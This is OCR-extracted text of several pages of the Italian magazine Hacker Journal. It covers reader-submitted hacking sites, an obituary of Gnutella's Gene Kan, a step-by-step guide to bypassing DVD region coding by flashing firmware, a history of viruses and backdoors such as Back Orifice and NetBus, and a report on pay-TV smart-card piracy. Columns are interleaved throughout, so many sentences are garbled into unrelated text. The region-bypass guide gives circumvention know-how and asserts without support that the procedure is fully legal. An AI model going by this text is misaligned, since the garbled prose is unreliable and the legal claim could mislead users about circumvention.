amici.Se non avete voglia di passare
NEI PANNI DEI CATTIVI
ata Security, società formata da esperti di
D sicurezza informatica, offre alle aziende e
vi rodete d’invidia? ore in linea a scaricare tutto ciò che di
I vostri compagni di scuola vi mandano più divertente circola in Rete, il 12
continuamente filmati via e-mail, ma il agosto correte in edicola a comprare agli enti pubblici un test che fornisce un’anali-
vostro modem ci impiega due giorni a PC Smile! si approfondita della sicurezza perimetrale. I
scaricare un video da 1 Mb? PC Smile è utilizzabile sia dagli utenti test vengono eseguiti in remoto, via Internet,
Oppure avete un collega che se la tira Macintosh, sia da quelli Windows. dal Centro di Ricerca sulla Sicurezza Informa-
“che il computer lo sa usare solo lui” e tica con programmi e procedure per indivi-
volete fargli un bello scherzetto con un Nell’ultima pagina di Hacker Journal duare tutte le possibili vie d’accesso ai siste-
falso virus? Problemi risolti!!! trovate un buono sconto di 1Euro mi. In questo modo, gli esperti si pongono nel-
Dal 12 agosto troverete in edicola PC per l’acquisto del primo numero di lo stesso punto di vista di un hacker che vo-
Smile, la nuova rivista, con un PC Smile! K lesse penetrare illegalmente.
Cd-Rom in regalo pieno zeppo di Per le aziende associate a Confindustria e per
filmati divertentissimi, giochi
PC la Pubblica Amministrazione (comuni,
realizzati in Flash con cui
sfidare i vostri colleghi, finti
virus (da usare con
attenzione!), immagini sexy e Smile province, regioni, aziende sanitarie e altri enti
pubblici) il primo Security Test è gratuito.
I test possono essere richiesti all’indirizzo
www.securitytest.it K

www.hackerjournal.it |9
HJ ha surfato per voi...
I classici 15 minuti di celebrità! Questi sono i vostri
della Rete

www.autistici.org
Nel manifesto del sito si legge “Per
iniziare, vogliamo tutto. Socializza-
re saperi, senza fondare poteri”.
Insieme al progetto gemello
www.inventati.org, il sito si propo-
ne di supportare il diritto alla co-
municazione, alla privacy e all’a-
nonimato, e di facilitare lo scambio
delle proprie conoscenze e risorse.
Per questo, allestisce strumenti e
risorse come caselle di posta “sicu-
re”, remailer anonimo, proxy, new- www.theblackwindow.6go.net
sgroup, e anche un nodo Freenet.
Se decidete di usare qualcuno dei Vorrei promuovere il mio sito hacker, è molto ricco di cose inte-
servizi, non dimenticate di passare ressanti riguardanti l’hacking....perfavore visitatelo.
dalla pagina “Manifesto”, dove
Alessandro
troverete le coordinate per effet-
tuare una donazione per sostenere
il progetto.
by

by
e

www.fuckinworld.org www.pirati.tk
www.gnomixland.com
Gnomix è un po’ come una vecchia
soffitta dove c’è di tutto, ma biso- Vi volevo segnalare quest’ot- Saluto tutto lo staff di hac-
gna saperlo trovare. C’è molto ma- kerjournal...avete fatto un
teriale relativo all’hacking, ma an- timo sito, per favore segnate- sito “SUPER” spero che cre-
che raccolte di link sugli argomen- lo nei vostri link, ne vale la sca sempre di più...vi scrivo
ti più vari (Mp3, sfondi scrivania,
pena. C’è di tutto, anche un questa email perchè volevo
avvenenti modelle e gli immanca-
bili loghi e suonerie). Cercando forum frequentatissimo: segnalarvi il mio sito e il sito
cercando, qualche chicca salta fuo- di tutti i miei collaboratori:
ri, anche se alcune scatole non PiratesZone
contengono quello che ci si aspetta Alex De Large
(per ovvi motivi, i link morti sono
una costante nei siti di hacking).

10 | www.hackerjournal.it
e
lat :
g na siti a
Se tri @
e l.it
os on
i v dazi urna
re erjo
ck
ha

siti; scegliete voi se tirarvela o vergognarvi I classici


della Rete

http://slashdot.org
Se in rete succede qualcosa che fa
http://clanost.interfree.it www.hackernet.tk rumore, state pur sicuri che su
slashdot se ne parla. Partito come
Ciao sono webmaster del sito Salve carissima redazione di sito di informazioni con commenti,
del Clan OST. Siamo una slashdot è riuscito a conquistarsi
Hacker Journal, se potete, un gran numero di utenti tra i più
neonata crew vi chiedo di se- inseritemi tra i vostri link, qualificati: tecno guru, amministra-
gnalare il sito su HJ speran- così potrei diffondere meglio tori, dirigenti, sviluppatori softwa-
do di ampliare la crew. Ci ri- la cultura hack. re, e hacker “veri”, quelli che non
uniamo in chat ogni sera al- Grazie in anticipo. hanno bisogno di dichiararlo. Ogni
le 21:30. giorno questo “popolo digitale” si
HackerNet collega, sfoglia le notizie ma so-
VladKazama prattutto le commenta, con una
competenza rara. Slashdot è così
orientato verso il software libero
che tutto il software che gestisce il
sito è open source e liberamente
scaricabile.

http://ildp.pluto.linux.it
Cercate documentazione su Linux
in Italiano? Smettete pure di cerca-
re e andate a questa pagina del
Pluto Linux User Groups. Si tratta
http://digilander.libero.it/System_BuG infatti della pagina ufficiale dell’I-
talian Linux Documentation Pro-
Innanzi tutto vi devo fare i miei complimenti sulla rivista dato che è ject, e anche se il nome è inglese,
molto bella. L’unica cosa che non mi piace molto sono tutte quelle im- contiene tutta la documentazione
magini di teschi e le copertine. Cmq a parte questo siete davvero fan- italiana esistente sul sistema
GNU/LInux: manuali, howto, gui-
tastici!!!! Ora detto quello che volevo dire passo a segnalarvi l’url del de, tutorial e chi più ne ha più ne
mio sito e spero che lo metterete nei vostri link!!!! metta. Risalendo di un ramo l’al-
Grazie!!!! Ciao. bero della directory, si trova il Plu-
[*°System_BuG°*] to, uno dei più antichi e numerosi
gruppi di utenti Linux.

www.hackerjournal.it |11
personaggio

ADDIO AL GENIO INFELICE DELLA RETE: GENE KAN

LINK UTILI Il nuovo Prometeo


C on Gnutella è possibile
condividere file su
Internet, in modo molto
simile a quanto un tempo si
faceva con Napster e i brani in
La storia dello sviluppatore appena
scomparso, che ha diffuso nel mondo il
protocollo Gnutella per lo scambio di file.
formato MP3. I principali
vantaggi di questo protocollo

G
sono la possibilità di ene Kan, considerato il porta- trale. Un pericolo di cui sbarazzarsi al più
condividere file di qualsiasi voce del gruppo che ha contri- presto: la sezione relativa a Gnutella del si-
tipo, e il fatto di non buito allo sviluppo e alla diffu- to di NullSoft è stata quindi chiusa nel giro
dipendere da un’unico ente, sione di Gnutella, è morto suici- di poche ore, per ordini ricevuti dall’alto.
azienda o server centrale, che da nella sua casa di San Mateo Ma era già troppo tardi. Tra gli “errori”
può essere attaccato dalle case in California. Un po’ perché se compiuti dal team di sviluppo (errori dal
di produzione così come è lo meritava, un po’ per chiarire alcune ine- punto di vista di AOL, s’intende), ve ne è
avvenuto per Napster e Audio sattezze rimbalzate sulla rete, gli dedichia- stato uno gravissimo. Pur se per poche ore,
Galaxy. Lo svantaggio è che la mo questo spazio. Gnutella era stato pubblicato come softwa-
rete Gnutella è molto più re Open Source, e quindi erano disponibili
frammentata: è però possibile >> La vera storia di anche i codici sorgenti. Il vaso di pandora
che cercando un file non lo si era stato aperto, e non c’era alcun modo di
riesca a trovare, anche se Gnutella richiuderlo.
questo è presente sull’hard
disk di un altro utente Pochi ricordano che Gnutella, uno dei pro- >> L’apporto di Gene
Gnutella. Il sistema prevede tocolli più rivoluzionari della rete, per le
infatti la presenza di tante sue caratteristiche di decentralizzazione
sotto reti, formate da nodi della condivisione dei file, è stato partorito Proprio basandosi sui sorgenti della prima
vicini tra di loro. Solo in seno alla più grande multinazionale che versione di Gnutella, Gene Kan e altri pro-
all’interno di una sottorete opera nel settore di Internet e della produ- grammatori hanno potuto mettere a punto
c’è un’alta probabilità di zione artistica e musicale, AOL/Time War- il protocollo e i software necessari, conti-
trovare effettivamente il file ner. Il progetto è infatti stato concepito dal nuando ovviamente a lasciare libero il co-
cercato in tempi ragionevoli. gruppo di programmatori di NullSoft, dice per ulteriori sviluppi. Per le sue qualità,
azienda che aveva già rilasciato program- Gene è stato scelto come portavoce del
www.gnutella.com mi innovativi come WinAmp e ShoutCast, gruppo, ed era lui ad apparire in interviste
Principale sito rispettivamente per la riproduzione/codifi- e programmi Tv, così come a conferenze
sul protocollo e ca di file Mp3 e per la loro diffusione in pubbliche e premiazioni. Anche per que-
i vari progammi. streaming su Internet. Nel maggio del sto, alla notizia della sua morte, molti titoli
1999 NullSoft è stata acquisita da si riferivano a lui come al “padre di Gnu-
www.bearshare.com AOL per 70 milioni di dollari. Cifra tella”, sovrastimando probabilmente il suo
Popolare client che, che anche nel periodo delle vacche ruolo nella creazione del protocollo. Que-
per Windows, recentemente grasse di Internet, non era certo da sotto- sto non significa però che Gene fosse solo
biasimato per l’impiego di valutare. Si può quindi immaginare con una persona “tutta immagine e poca so-
Spyware. quanta sorpresa i vertici di AOL/Time War- stanza”. Oltre a occuparsi dello svilup-
ner abbiano reagito quando, nel marzo po di Gnutella, ha infatti fondato In-
http://gtk- 2000 hanno scoperto che i ragazzotti che fraSearch, azienda che si occupava di
gnutella.sourceforge.net si erano appena portati in casa avevano ri- sviluppare un motore di ricerca per reti
Client grafico per qualsiasi lasciato un protocollo e un programma peer to peer. La società è stata in seguito
Unix che supporti le librerie che minacciava di minare fin dalle fonda- acquisita da Sun Microsystems, e Gene
GTK+ (in versione 1.2 o menta alcune delle attività più redditizie stesso è passato alle dipendenze della
superiore). del gruppo: la produzione musicale e cine- mamma di Java. Negli ultimi mesi, Gene
matografica. Gnutella permetteva in- lavorava infatti al progetto JXTA, col quale
www.limewire.com fatti di condividere file di qualsiasi Sun Microsystems vuole portare il concetto
Client scritto in Java, funziona tipo, Mp3 e video compresi, senza del peer to peer sugli accessori più svariati
con Windows, Mac e Unix. alcuna possibilità di controllo cen- (computer, telefoni, palmari eccetera). K

12 | www.hackerjournal.it
VideoHack

>>
COME MODIFICARE IL CODICE REGIONALE DEI DVD

Videolettori di tutto il mondo, Unitevi!


Le majors decidono che un certo film lo può vedere un americano ma non un europeo,
un africano o un indiano. Se anche a voi questo non piace, e volete forzare questo
“embargo culturale”, leggete qui!

N
Di tutte le limitazioni all’uti-
lizzo di un DVD Video impo-
ste dalle case di produzio-
ne, la più odiosa e appa-
rentemente insulsa è quella
che riguarda la zona geo-
grafica in cui è possibile vedere il film.
Alla faccia del libero mercato e della li-
bera circolazione della cultura, le ma-
jors di Hollywood hanno suddivi-
so il mondo in sei aree geografi-
che; i lettori DVD venduti in ogni
area non possono utilizzare i DVD
venduti nelle altre cinque zone. Se
chiedete loro il perché di questa scelta,
li sentirete bofonchiare qualcosa ri-
guardo alla necessità di frenare la pi-
rateria e cose simili, ma il vero punto è La mappa dell’impero digitale delle case di produzione cinematografica.
che le majors vogliono poter deci- Mai come in questi casi, è stato azzeccato il motto “Di-Vi-Di èt impera”.
dere quando e come (se non ad-
dirittura “se”) un certo film deve un computer, dal software di riprodu- aumentato di uno. Quando il con-
essere visto dagli abitanti di una zione o dal sistema operativo). È evi- tatore arriva a 5, la zona non è
certa regione. Questo permette loro dente che, se si tratta di un’impostazio- più modificabile se non da un centro
per esempio di proiettare un film nelle ne software, questa può essere modifi- di assistenza del produttore. Anche
sale europee mesi dopo la sua uscita cata a piacimento, e –proprio come ac- produttore però ha a disposizione un
negli Stati Uniti, senza che gli spettato- cade con i codici per le gabole dei vi- numero limitato di “azzeramenti” del
ri europei abbiano già visto il DVD, deogiochi– su Internet hanno comin- contatore; esauriti questi, il DVD è
magari acquistato per posta proprio ciato a circolare le sequenze di tasti da bloccato per sempre su una zona.
negli USA. pigiare sul telecomando del DVD per
Bisogna notare che non è assoluta- modificare la zona impostata (per i let- >> Fatta la legge trovato
mente vietato acquistare un letto- tori DVD-ROM montati sui PC, esistono
re di DVD americano, africano o dei programmini che permettono di fa- l’inganno!
giapponese per poter vedere i re la stessa cosa).
film venduti in quelle zone. Il do- Sul finire degli anni 90 però, annusata Anche in questo caso però, non è stato
ver comprare sei diversi lettori per po- l’aria che tirava, le majors hanno im- modificato l’hardware del lettore, ma
ter vedere qualsiasi DVD regolarmente posto un’ulteriore limitazione ai pro- solo il suo software: i lettori RPC2 sono
acquistato e pagato, ci pare però una duttori di DVD: per poter ottenere dal uguali a quelli RPC1 ma hanno un di-
richiesta un po’ troppo esosa. DVD Forum le chiavi per decifrare i fil- verso firmware (il software registrato in
mati, i produttori dovevano impegnarsi memorie non volatili, necessario al
a supportare una nuova tecnologia di funzionamento interno di un apparec-
>> Come Funziona la protezione, chiamata RPC2, che limi- chio). Quindi, se è possibile sosti-
Protezione tasse la possibilità di modificare l’area tuire il firmware conforme alle
geografica del lettore in questione. Il specifiche RPC2 con quello prece-
Di uno stesso film, viene prodotto un sistema RPC2, diventato obbligatorio a dente, RPC1, si può avere un let-
DVD con una codifica differente per partire dal primo gennaio 2000, è un tore di DVD che non si blocca do-
ogni regione. Inizialmente, i lettori di po’ più sofisticato, ed è implementato po cinque modifiche della zona.
DVD (nel senso di “meccanica” del let- nel lettore stesso; in ogni lettore DVD Manco a dirlo, sostituire il firmware
tore) erano in grado di leggere i dischi che utilizza questo sistema è presente RPC2 con la precedente versione RPC1
di qualsiasi zona, e gli eventuali con- un contatore. Ogni volta che si mo- è possibile, e nemmeno troppo compli-
trolli venivano fatti a valle (nel caso di difica la zona, il contatore viene cato. Su Internet si trovano collezioni di

13| www.hackerjournal.it
VideoHack

firmware vecchi ma meno schizzinosi di


quelli attuali per quanto riguarda i
cambi di zona. Esistono firmware che
rendono il lettore “region free” (senza
più impostazioni di zona, e quindi in
? Flashare: modificare un
firmware, che solitamente è
scritto in un tipo di memoria
definita “memoria flash”.
grado di leggere DVD di qualsiasi re-
gione), e altri che permettono di modi- grammi variano a seconda del modello
ficare manualmente la zona senza le li- di scheda video e si trovano all’indirizzo
mitazioni imposte dai contatori. http://digital-digest.com/dvd/arti-
La fatica maggiore quindi consiste nel- cles/region_hardware.html. Prima di
l’individuare la marca e il modello usare un DVD Video, bisognerà control-
esatto del proprio lettore DVD (non ba- lare la regione per cui è stato codificato,
sta guardare la scatola, perché molto e modificare le impostazioni usando il
spesso lo stesso modello viene venduto programma più appropriato.
con marchi differenti), e nel trovare la

4
versione giusta del firmware. Se il lettore non è “region
free”, occorre fare in modo
che lo diventi.
>> All’opera Dopo aver verificato marca e
video (lettore hardware) o se viene effet- modello esatti, andate all’in-
Prima che vi accingiate a fare qualsiasi tuata da un programma (via software). dirizzo http://digital-digest.com/
cosa con il vostro lettore DVD, voglia- Se il lettore è impostato su una zona spe- dvd/downloads/firmware.html o
mo avvisarvi che la modifica del cifica, passate al punto 4. sul sito www.firmware.fr.st e scarica-
firmware è sempre un’operazione te il file corrispondente. Per flashare

2
delicata: se qualcosa dovesse andare Se la decodifica avviene (installare) il firmwa-
storto durante l’operazione (se salta la via software, l’impostazione re, potrebbe es-
corrente, si impalla il computer o il file regionale può essere bypassa- sere necessario
del firmware scaricato da Internet fosse ta usando programmi come scaricare anche
corrotto), il lettore di DVD potrebbe Dvd Genie (www.inmatrix.com) o Dvd un’utility, che sa-
diventare inutilizzabile, e solo il Region Killer (http://digital-digest.com rà indicata nella
centro di assistenza potrebbe ripararlo. /dvd/ downloads/dvdrk.html), senza pagina in que-
La modifica al firmware inoltre invali- preoccuparsi di altro, e impostare la stione). Non tutti i
da la garanzia; se il lettore è stato regione 0. lettori possono
acquistato da poco, pensateci due vol- essere resi “re-

3
te prima di rinunciare a un lungo pe- Se la decodifica avviene via gion free”; se il vo-
riodo di garanzia e supporto gratuito. hardware, e il disco è “region stro non fosse nella
free”, bisogna usare dei lista, non ci sono soluzioni facilmente

1
Come prima cosa, bisogna programmi che permet- praticabili (bisognerebbe cioè copiare
ottenere informazioni sul tano di cambiare le impostazioni ogni singolo supporto
proprio lettore di DVD. di zona della scheda video senza DVD, eliminando la co-
Questa operazione può essere aumentare il contatore. Questi pro- difica regionale).
svolta con un programma come
CDVDInfo (http://digital-digest.com/
dvd/downloads/cdvdinfo.html). Se il I MAC E IL
programma rivela che il lettore REGION CODE
è “region free”, rimane da de-
terminare se la decodifica av- Tutte le cose dette per quanto ri-

A
viene nella guarda Windows valgono anche
scheda per Mac, con un’ovvia eccezione: i
programmi citati sono solo per
Windows. Niente paura: anche per
Mac (Classico e OS X) esiste tutta
l’attrezzatura necessaria per libe-
rare il proprio lettore di DVD. Tut-
te le informazioni, gli strumenti
necessari e le patch per il firmwa-
re dei lettori DVD si possono facil-
mente trovare su Internet. Uno dei
siti migliori è The Mac DVD Re-
source, che si trova all’indirizzo
www.wormintheapple.gr/macdvd.

14| www.hackerjournal.it
>>
PILLOLE
5 6
Dopo aver scaricato il firm- Dopo aver cambiato le impo-
ware ed eventualmente il stazioni hardware o software,
programma per la sua in- conviene far riconoscere nuo-
stallazione, procedete al- vamente il lettore DVD a Win- RCE,L’ULTIMA TROVATA
l’aggiornamento (anzi, all’invecchia- dows (che conserverà altri-
mento), avendo cura menti le impostazioni precedenti, impe- DELLE MAJORS
di lavorare in con- dendo comunque la visualizzazione di
dizioni di massi- DVD di aree diverse). Se tutto è andato Consapevoli del fatto

1
ma sicurezza: leg- come dovrebbe, potrete a questo punto che i lettori possono es-
gete tutte le istru- vedervi il vostro film preferito in- sere taroccati (e che in
zioni che trovate, dipendentemente dall’a- certi casi vengono addi-
uscite da tutti i rea geografica per rittura venduti già come
programmi, e se cui è stato prodotto. “region free”, per esem-
c’è un tempora- Ricordiamo ancora pio da www.zone-
le, forse è meglio una volta che l’ope- freedvd.com), la Mo-
che rimandate l’operazio- razione è perfetta- tion Picture Association
ne. Un inconveniente a que- mente legale, ma ren- of American (MPAA) ha
sto punto renderà inutilizzabile il de nulla la garanzia del sviluppato un nuovo si-
vostro lettore. lettore. K stema, chiama-

PER I LETTORI DA
to RCE (Regional
Code Enhan-
cing), che impe-
2
TAVOLO disce la visua-
lizzazione del DVD
Con i lettori DVD da tavolo (quelli da Video sui lettori “re-
collegare alla TV, come un videoregi- gion free”. L’unico mo-
stratore) ovvimente non è possibile met- do per aggirare la prote-
tersi a pistolare con dei programmi per zione è quello di impo-
carpire le informazioni sulla meccanica stare la zona prima di in-

3
ed eventualmente flashare il firmware, serire il DVD, ma questo
ma non tutto è perduto. Per risparmiare, ovviamente può essere
i lettori DVD da tavolo vengono prodotti fatto solo con i lettori
tutti uguali, e poi viene impostato il codi- RPC-1. In caso contra-
ce regionale in qualche modo. In molti casi è quindi possibile modificare questa rio, dopo cinque cambi
impostazione di volta in volta, o addirittura rendere il lettore “region free”. A volte di zona il lettore si bloc-
può essere necessario aprire il lettore e spostare un interruttore o un jumper, mol- cherà sull’ultima regione
to spesso basta digitare una particolare combinazione di tasti sul telecomando. In impostata. Attualmente
certi casi non c’è nulla da fare: l’operazione può essere fatta solo da un centro di l’RCE è implementato
assistenza. La situazione varia da marca a marca, e da modello a modello. Al so- solo sui DVD prodotti

4
lito, Internet si rivela una fonte inesauribile di informazione, Ecco un paio di siti da per la zona 1 (USA),
non perdere: e non si sa se verrà ap-
plicato anche altrove.
VCDHelp - DVD Player Hacks
www.vcdhelp.com/dvdplayershack.php
Una lista piuttosto nutrita di modelli, ma i trucchi non sempre funzionano. Usateli
AREA ZERO
con cautela. NELLO SPAZIO
DVD Reviewer - Multi Region Hacks Già da un paio di anni,
www.dvd.reviewer.co.uk/info/multiregion sulla stazione spaziale
Essendo un sito inglese, ha il pregio di elencare molti lettori con le sigle con cui sono internazionale sono stati

5
venduti in Europa (spesso diverse da quelle degli stes si lettori negli USA). installati due lettori di
DVD con area code
uguale a zero. Orbitan-
do attorno alla terra, la
piattaforma infatti
non rientra in alcuna
delle zone previste.
La mano lunga delle
multinazionali dell'intrat-
tenimento non può arri-
vare fin lassù.

6
www.hackerjournal.it |15
Virus

COME NASCONO E COME SI DIFFONDONO I VIRUS

Virus: il fenomeno
Una breve storia di uno dei fenomeni più devastanti del lato oscuro

l virus è un programma. Il va vantare un maggior numero di virus ri-

I
nome VIRUS deriva dal fat- prodotti, cioè chi aveva creato il virus
to che tali programmi si au- più potente. Nel 1970 nasce
toreplicano e sono quindi Creeper. Si tratta di un vi-
costretti ad attaccarsi ad un rus creato da Bob Tho-
altro programma. In pratica la stessa cosa mas diffuso nella
che farebbe un virus biologico, che per in- rete ARPAnet. Il
fettare, replicarsi e vivere nel nostro orga- virus si presen-
nismo ha bisogno di una cellula. tava scrivendo a
I virus sono solitamente scritti da abili pro- video “I’m
grammatori, ma in Rete sì trovano ap- Creeper, catch
plicazioni che consentono, anche ai me if you can!”.
meno esperti di creare un virus com- Negli anni 80
plesso con pochi clic. nasce il primo Ca- svol-
Alcuni virus sono scritti solo per la voglia vallo di Troia. Un ta. Inizia-
del programmatore di mettersi alla prova, programmatore creò una rono ad ap-
di “vedere se ne è capace” o di dimostra- versione di un famoso gioco parire i primi
re al mondo la loro bravura. Altri non so- chiamato Animal, che durante virus capaci di
no che uno scherzo. A volte intendono in- l’esecuzione si riproduceva an- sfruttare le debolezze
viare un messaggio di protesta o d’altro dandosi a porre in tutti i sistemi di questo sistema opera-
genere. In realtà, solo pochi virus sono collegati. Lo scopo del programmatore tivo.
scritti con lo scopo di provocare danni. era di diffondere un nuovo metodo di dis- Una vera e propria rivoluzione
tribuzione del software chiamato “Pervasi- avvenne quando si presentò una
>> La storia dei Virus ve Release”. Quel tipo di programma pre- minaccia quasi del tutto inattesa: quella
se il nome di “cavallo di Troia” per indica- dei virus macro. La prima infezione di
informatici re che conteneva al suo interno un agente questo tipo ad entrare in libera circolazio-
infettivo ne fu Word.Concept, che usava il lin-
La storia di questo fenomeno nasce con Nel 1985 in Italia nasce Ping Pong, guaggio di programmazione di Microsoft
l’inizio stesso dell’informatica: un virus che simpaticamente faceva com- Word. Siccome lo stesso linguaggio di
Nel 1959 tre programmatori dei Bell parire sullo schermo una pallina, la quale scripting viene usato anche da altri pro-
Laboratories svilupparono “Core rimbalzava producendo danni. Ping Pong grammi Microsoft, primo tra tutti Outlook
Wars”, un gioco in cui ognuno dei pro- proveniva dal Politecnico di Torino, nello e la sua versione gratuita Outlook Express,
grammatori scriveva dei programmi in stesso istituto universitario fu sviluppata hanno cominciato a diffondersi virus spe-
grado di riprodursi, nascondendoli nel l’utilità Devirus che individuava il codice cifici per la posta elettronica, che utilizzano
computer. Ad un segnale convenuto, ogni Ping Pong e lo eliminava. questi programmi come veicolo di conta-
virus cercava di riprodursi e distruggere gli Nel 1986 viene alla luce Brain, un vi- gio. Sono quindi nati virus con una veloci-
altri virus. Alla fine vinceva colui che pote- rus che infettava il settore di boot del tà e una vastità di diffusione mai vista pri-
floppy disk. Brain fu sviluppato in Pakistan ma: Melissa, I Love You e molti altri.
da due fratelli, Basit e Amjad. Brain non
aveva un codice dannoso, ma si limitava a >> Trojan e Backdoor
riprodursi su tutti i dischetti inseriti nel let-
tore di un PC infetto modificandone l’eti- La tipologia di virus che più minaccia la
chetta con il testo “(c) Brain”. nostra privacy è quella dei cavalli di Troia,
Nel 1990 la complessità dei virus fe- o meglio una loro sotto-tipologia chiama-
ce un passo in avanti. Furono creati, ta Backdoor Trojan. Sono costituti da
infatti, virus definiti polimorfi. Un hacker un’applicazione di tipo client e da un ser-
noto come Dark Avenger, distribuì il Muta- ver (che risiede sul computer infetto).
NetBus permette di prendere il totale
tion Engine; un programma che consenti- La parte server può essere inserita all’in-
controllo della macchina su cui viene va a tutti di creare virus polimorfi. L’arri- terno di un qualsiasi file eseguibile e rap-
installata, quasi sempre a tradimento, la vo di Windows 95 segnò un punto di presenta il file che sarà diffuso mediante
versione server del programma.

16| www.hackerjournal.it
>>

della Distruzione
dell’hacking, con una descrizione delle tipologie principali di virus.

e-mail o attraverso un qualunque softwa- nosciuta. Controllare tsempre utti i file che Un metodo per difendersi da programmi di
re Una volta attivata l’applicazione server, s’immettono nel sistema, anche perché la BackDoor Trojan è di istallare un buon
chi ha il client e le chiavi di accesso diffusione dei virus avviene mag- programma di rilevazione e aggior-
può prendere il controllo completo giormente con lo scambio di file tra narlo frequentemente. Questo pro-
della macchina server, ed efefttuare amici o per email. La posta elettronica è gramma dovrebbe essere affiancato da un
operazioni di trasferimento file, uno dei principali mezzi di diffusione di vi- FireWall, che controlla rigorosamen-
controllo della rete, ricerca di pas- rus: basta aprire il file infetto allegato a un te tutti i programmi che tentano di
sword, apertura del lettore CD e de- messaggio per essere contagiati. È oppor- accedere ad Internet e segnala chi cer-
cine di altre operazioni. tuno controllare sempre i file allegati con ca di entrare nel nostro computer. Ovvia-
un programma antivirus. In particolare oc- mente, il sistema più sicuro di tutti è quello
Euristica: una tecnologia antivirus corre controllare i file che presentano le di lasciare stare il Computer ed usare la

? che tiene sotto controllo alcuni sintomi


tipici della presenza di un virus come
ad esempio modifiche non previste
nella dimensione del file.
estensioni: exe, dll, com, sys, vbx, pif, scr,
ocx, vbs ed i file documento che possono
contenere anche macro: doc, xls, dot, xla.
Macchina da Scrivere!! K

Nazzareno Schettino - www.notrace.it

Le BackDoor più conosciute sono senza TIPOLOGIE DI VIRUS


dubbio Back Orifice e NetBus.
Back Orifice è una backdoor proget- Esistono vari tipi di virus informatici, virus. In generale sono virus che infet-
tata per Windows e permette di pren- catalogabili in base a come si compor- tano il DOS. Esistono molte varianti di
dere il controllo di una macchina. Gli in- tano, sopravvivono, si autotrasmettono questo virus:
trusi possono accedere al server di BO e così via. Eccone un elenco:
usando un’interfaccia testuale per Unix o MBR STEALTH: questo virus infetta
un client grafico per Windows. Il server di BOOT SECTOR VIRUS: infettano la parte l’MBR “master boot record” salvando
BO permette agli intrusi di eseguire co- di un floppy o hard disk contenente una copia del MBR originale che sosti-
mandi, leggere file ed eseguire trasferi- informazioni necessarie all'avvio del tuisce a quella infetta quando un anti-
menti di file da e verso la vostra macchina, sistema. La diffusione avviene general- virus va a controllare la sezione dei
modificare il registry, avviare e fermare i mente quando si avvia un PC da un master boot record.
processi e tantissimi altri trucchi. NetBus floppy infetto.
consente, tramite un semplice pan- CLEAN ON-THE-FLY: questo virus inter-
nello di controllo, di svolgere le stes- FILE VIRUS: sono dei virus che infettano cetta tutte le operazioni di lettura sui fi-
se funzioni di BO ed altre ancora. Tra file di programmi (con estensioni .exe, les. Se un antivirus legge un file infet-
queste l’apertura del microfono del vostro .com, ecc.) e si replicano ad ogni avvio to, il virus intercetta l’operazione di let-
Pc, trasformandolo in una cimice che del programma infetto. tura e ripulisce il file rendendolo nor-
ascolta quello che state dicendo. male al controllo, una volta finita l’ope-
MACRO VIRUS: è il tipo di virus più dif- razione il virus reinfetta il file.
fuso. In pratica è un programma scritto
>> Come difendersi in Visual Basic (VBA, ovvero Visual Ba- TROJAN VIRUS: è un programma che al
sic for Applications). suo interno contiene un sottocodice
Per diminuire il rischio d’infezioni occorre dannoso che si attivava al determinarsi
istallare un antivirus e aggiornarlo MULTIPARTITE VIRUS: per diffondersi di certe condizioni.
frequentemente (almeno su base men- utilizza una combinazione di tecniche.
sile). Avere un antivirus non aggiornato Il tipo più comune unisce il metodo di ZOO VIRUS: sono virus che vivono solo
equivale a non averlo! E’ opportuno con- lavoro di un virus di boot e di file. nei laboratori di ricerca perché non so-
trollare periodicamente la presenza di vi- no riusciti a diffondersi.
rus nel proprio computer, sottoponendo a POLYMORPHIC VIRUS: è un virus che
controllo qualsiasi CD o floppy di prove- muta ogni volta che si riproduce. IN-THE-WILD VIRUS: sono dei virus che
nienza sospetta prima di eseguire uno dei vivono allo stato selvaggio, cioè sono
file in esso contenuti. Non bisogna ese- STEALTH VIRUS: utilizza vari trucchi per sfuggiti al controllo e sono attualmente
guire mai programmi d’origine sco- nascondersi e sfuggire ai software anti- in circolazione.

www.hackerjournal.it |17
TV SAT

COME NASCONO E COME SI DIFFONDONO I VIRUS

Seca2: è tutto oro


Sono passati quasi due mesi dalla “Operazione
Nuova Smart Card”, e su Internet si parla solo di

L
La lunga battaglia fra Telepiù cale che li porta a stare da-
Digitale e gli Hackers sem- vanti al PC anche per 12
brerebbe conclusa. Nei corri- ore di fila, benché agisca-
doi milanesi i tecnici dell’e- no illegalmente cercando
mittente televisiva sono fieri di decifrare le trasmis-
del lavoro svolto e sono con- sioni accessibili a pa-
vinti di aver segnato un punto fonda- gamento; i commer-
mentale contro la pirateria grazie al- cianti invece sfruttano
l’installazione del Seca MediaGuard le conoscenze e il sudo-
2.0: “Con la chiusura del vecchio siste- re degli “studiosi” per
ma e l’introduzione del nuovo sistema creare un traffico illecito
Mediaguard portiamo a compi- di card non autorizzate alla
mento la più importante visione dei programmi. Gli
operazione anti- unici ad avere un vero vantaggio
pirateria dalla pirateria sono proprio i commer- mente alle foto della
m a i cianti disonesti, e non tanto gli utenti nuova card ce ne sono
fatta in che sborsano grosse somme di denaro altre che testimonie-
Italia”, per una card taroccata che molto spes- rebbero l’avvenuto
ha di- so smette di funzionare dopo un po’ di Crack del nuovo
chiarato tempo. sistema.
Olivier Ge- Ovviamente il fenomeno di maggiore Noi non
rolami, Am- espansione delle notizie sul sistema di ci crediamo, però pensiamo che questa
ministratore codifica firmato Tele+ è Internet: new- volta qualche verità ci sia: un sito in-
Delegato di sgroup, interi siti internet, chat, forum e glese che offriva tutte le notizie ineren-
Tele+, “com- mailing list pullulano di iscritti. ti alla nuova scoperta è stato chiuso nel
piendo un salto Sono apparse le “normali” voci di cor- giro di 12 ore con una tempestività de-
tecnologico nella ridoio qualche giorno dopo “Scoperto gna di nota. Perché gli altri siti che ri-
difesa dell’esclu- Crack per il Seca 2.0”, voci che tuttora portano le “bufale” Seca 2 sono tuttora
sività dei nostri però risultano non confermate. Dall’al- online?
programmi che pre- tra parte, gruppi di persone costituisco- Questo è il motivo che ci porta a fare
sto convincerà anche no delle Community “morali” che criti- qualche riflessione non del tutto “posi-
i più scettici. Il nuovo cano gli elevati prezzi della PayTv mila- tiva”, anche se è possibile che si tratti
sistema non solo è nese e perciò ritengono impossibile della solità “bufala internettiana”. So-
estremamente complesso, ma è dotato l’arresto della Pirateria. Dopo il primo lamente il tempo ci svelerà la verità.
anche di efficaci misure di autodifesa Boom di notizie si è passati a un perio-
capaci di bloccare i tentativi di intrusio- do di relativa tranquillità nel quale le
ne. D’ora in avanti si potrà avere ac-
cesso ai programmi trasmessi da Tele-
più Digitale solo abbonandosi regolar-
mente.” …
“acque” sembravano essersi calmate.
A fine luglio però è giunta in Italia una
nuova sigla: “D2”.
